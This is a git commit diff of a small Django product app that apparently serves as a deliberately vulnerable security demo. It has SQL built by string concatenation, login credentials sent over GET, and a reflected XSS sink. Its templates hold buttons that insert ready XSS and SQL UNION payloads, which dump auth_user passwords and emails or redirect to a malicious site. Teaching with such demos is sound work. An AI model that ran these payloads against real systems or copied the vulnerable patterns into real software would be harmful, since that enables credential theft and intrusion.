Initial implementation
This commit is contained in:
parent
a4a0eb4fff
commit
fe3814b228
GPG Key ID:
258D0F70DB84CD5D
|
|
@ -0,0 +1,5 @@
|
||||||
|
from django.db import models
|
||||||
|
|
||||||
|
|
||||||
|
class Product(models.Model):
|
||||||
|
name = models.CharField(max_length=30)
|
||||||
|
|
@ -27,6 +27,7 @@ DEBUG = True
|
||||||
|
|
||||||
ALLOWED_HOSTS = []
|
ALLOWED_HOSTS = []
|
||||||
|
|
||||||
|
LOGIN_REDIRECT_URL = '/'
|
||||||
|
|
||||||
# Application definition
|
# Application definition
|
||||||
|
|
||||||
|
|
@ -37,6 +38,7 @@ INSTALLED_APPS = [
|
||||||
'django.contrib.sessions',
|
'django.contrib.sessions',
|
||||||
'django.contrib.messages',
|
'django.contrib.messages',
|
||||||
'django.contrib.staticfiles',
|
'django.contrib.staticfiles',
|
||||||
|
'project1'
|
||||||
]
|
]
|
||||||
|
|
||||||
MIDDLEWARE = [
|
MIDDLEWARE = [
|
||||||
|
|
@ -51,10 +53,11 @@ MIDDLEWARE = [
|
||||||
|
|
||||||
ROOT_URLCONF = 'project1.urls'
|
ROOT_URLCONF = 'project1.urls'
|
||||||
|
|
||||||
|
TEMPLATE_DIR = os.path.join(BASE_DIR, "templates")
|
||||||
TEMPLATES = [
|
TEMPLATES = [
|
||||||
{
|
{
|
||||||
'BACKEND': 'django.template.backends.django.DjangoTemplates',
|
'BACKEND': 'django.template.backends.django.DjangoTemplates',
|
||||||
'DIRS': [],
|
'DIRS': [TEMPLATE_DIR],
|
||||||
'APP_DIRS': True,
|
'APP_DIRS': True,
|
||||||
'OPTIONS': {
|
'OPTIONS': {
|
||||||
'context_processors': [
|
'context_processors': [
|
||||||
|
|
|
||||||
|
|
@ -13,9 +13,19 @@ Including another URLconf
|
||||||
1. Import the include() function: from django.urls import include, path
|
1. Import the include() function: from django.urls import include, path
|
||||||
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
|
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
|
||||||
"""
|
"""
|
||||||
from django.contrib import admin
|
from django.contrib import admin, auth
|
||||||
from django.urls import path
|
from django.urls import path, include
|
||||||
|
from . import views
|
||||||
|
|
||||||
urlpatterns = [
|
urlpatterns = [
|
||||||
path('admin/', admin.site.urls),
|
path('admin/', admin.site.urls),
|
||||||
|
path('', views.home),
|
||||||
|
|
||||||
|
path('find_product', views.find_product),
|
||||||
|
path('login', views.login),
|
||||||
|
path('do_login', views.do_login),
|
||||||
|
path('logout', views.logout),
|
||||||
|
path('add_product', views.add_product),
|
||||||
|
path('import_products', views.import_products)
|
||||||
|
|
||||||
]
|
]
|
||||||
|
|
|
||||||
|
|
@ -0,0 +1,53 @@
|
||||||
|
from django.http import HttpResponse, HttpResponseRedirect
|
||||||
|
from django.shortcuts import render
|
||||||
|
from project1.models import Product
|
||||||
|
from django.contrib import auth
|
||||||
|
from django.contrib.auth.decorators import login_required
|
||||||
|
from django import forms
|
||||||
|
|
||||||
|
@login_required(login_url='/login')
|
||||||
|
def home(request):
|
||||||
|
return render(request, "index.html")
|
||||||
|
|
||||||
|
def login(request):
|
||||||
|
return render(request, 'login.html')
|
||||||
|
|
||||||
|
def logout(request):
|
||||||
|
auth.logout(request)
|
||||||
|
return HttpResponseRedirect("/")
|
||||||
|
|
||||||
|
def do_login(request):
|
||||||
|
username = request.GET.get('username', '')
|
||||||
|
password = request.GET.get('password', '')
|
||||||
|
user = auth.authenticate(username=username, password=password)
|
||||||
|
if user is not None and user.is_active:
|
||||||
|
auth.login(request, user)
|
||||||
|
return HttpResponseRedirect("/")
|
||||||
|
else:
|
||||||
|
return HttpResponseRedirect(f"/login?message={username} not found.")
|
||||||
|
|
||||||
|
@login_required(login_url='/login')
|
||||||
|
def add_product(request):
|
||||||
|
name = request.POST.get('name', '')
|
||||||
|
product = Product.objects.create(name=name)
|
||||||
|
print('Added product ' + product.name)
|
||||||
|
return HttpResponse(content='Saved product ' + product.name)
|
||||||
|
|
||||||
|
def find_product(request):
|
||||||
|
search = request.GET.get('name', '')
|
||||||
|
print('Searching for ' + search)
|
||||||
|
products = Product.objects.raw(
|
||||||
|
"SELECT * FROM project1_Product where name like '%" + search + "%'")
|
||||||
|
return HttpResponse("<br/>".join(map(lambda p: p.name, products)))
|
||||||
|
|
||||||
|
@login_required(login_url='/login')
|
||||||
|
def import_products(request):
|
||||||
|
form = UploadFileForm(request.POST, request.FILES)
|
||||||
|
if form.is_valid():
|
||||||
|
file = request.FILES['file']
|
||||||
|
return HttpResponseRedirect('/')
|
||||||
|
else:
|
||||||
|
return HttpResponse(content="Upload failed.")
|
||||||
|
|
||||||
|
class UploadFileForm(forms.Form):
|
||||||
|
file = forms.FileField()
|
||||||
|
|
@ -0,0 +1,45 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
|
||||||
|
<body>
|
||||||
|
<p>
|
||||||
|
<form method="POST" action="/add_product">
|
||||||
|
{% csrf_token %}
|
||||||
|
<label>Add product:</label><br>
|
||||||
|
<input id="add_product" name="name" type="text" />
|
||||||
|
<button type="submit">Submit</button>
|
||||||
|
<a href="#" onClick="xss_inject_attack()">XSS injection attack (steal cookies)</a>
|
||||||
|
</form>
|
||||||
|
</p>
|
||||||
|
<p>
|
||||||
|
<form method="GET" action="/find_product">
|
||||||
|
<label>Find Product by Name</label><br/>
|
||||||
|
<input id="find_product_by_name" name="name" type="text" />
|
||||||
|
<button type="submit ">Search</button>
|
||||||
|
<a href="#" onClick="sql_inject_attack()">Sql injection attack (Get all users of system along with their details)</a>
|
||||||
|
</form>
|
||||||
|
</p>
|
||||||
|
<p>
|
||||||
|
<form method="POST" action="/import_products" enctype="multipart/form-data">
|
||||||
|
{% csrf_token %}
|
||||||
|
<label for="file">Import Products (XML):</label><br>
|
||||||
|
<input name="file" type="file" />
|
||||||
|
<button type="submit ">Submit</button>
|
||||||
|
</form>
|
||||||
|
</p>
|
||||||
|
|
||||||
|
<a href="/logout">Log out</a>
|
||||||
|
|
||||||
|
<script>
|
||||||
|
function xss_inject_attack() {
|
||||||
|
document.querySelector("#add_product").value = "<script>alert('I got your cookie, ha-haa!')</scr" + "ipt>";
|
||||||
|
}
|
||||||
|
|
||||||
|
function sql_inject_attack() {
|
||||||
|
document.querySelector("#find_product_by_name").value = "' AND false UNION ALL select id, username||' '||password||' '||first_name||''||last_name||' '||email from auth_user where username like '";
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</html>
|
||||||
|
|
@ -0,0 +1,23 @@
|
||||||
|
<h2>Log In</h2>
|
||||||
|
<form method="GET" action="do_login">
|
||||||
|
<label for="username">Username:</label>
|
||||||
|
<input id="username" type="text" name="username" /><a href="#" onclick="xss_inject()">XSS injection attack (site redirect)</a><br/>
|
||||||
|
<label for="password">Password:</label>
|
||||||
|
<input type="password" name="password" /><br/>
|
||||||
|
<button type="submit">Log In</button>
|
||||||
|
|
||||||
|
<div style="color:red" id=message></div>
|
||||||
|
|
||||||
|
<script>
|
||||||
|
function xss_inject() {
|
||||||
|
var img = "https://www.freepnglogos.com/uploads/hacker-png/hacker-interpol-arrests-suspected-anonymous-hackers-motley-5.png";
|
||||||
|
document.querySelector("#username").value = `<img src="${img}" onload="window.location.href='http://some.malicious.site.com';this.parentNode.removeChild(this);"/>`;
|
||||||
|
}
|
||||||
|
parameters = new URLSearchParams(window.location.search);
|
||||||
|
if (parameters.get('message')) {
|
||||||
|
message = decodeURIComponent(parameters.get('message'));
|
||||||
|
console.log(message);
|
||||||
|
document.querySelector("#message").innerHTML = message;
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</form>
|
||||||
Loading…
Reference in New Issue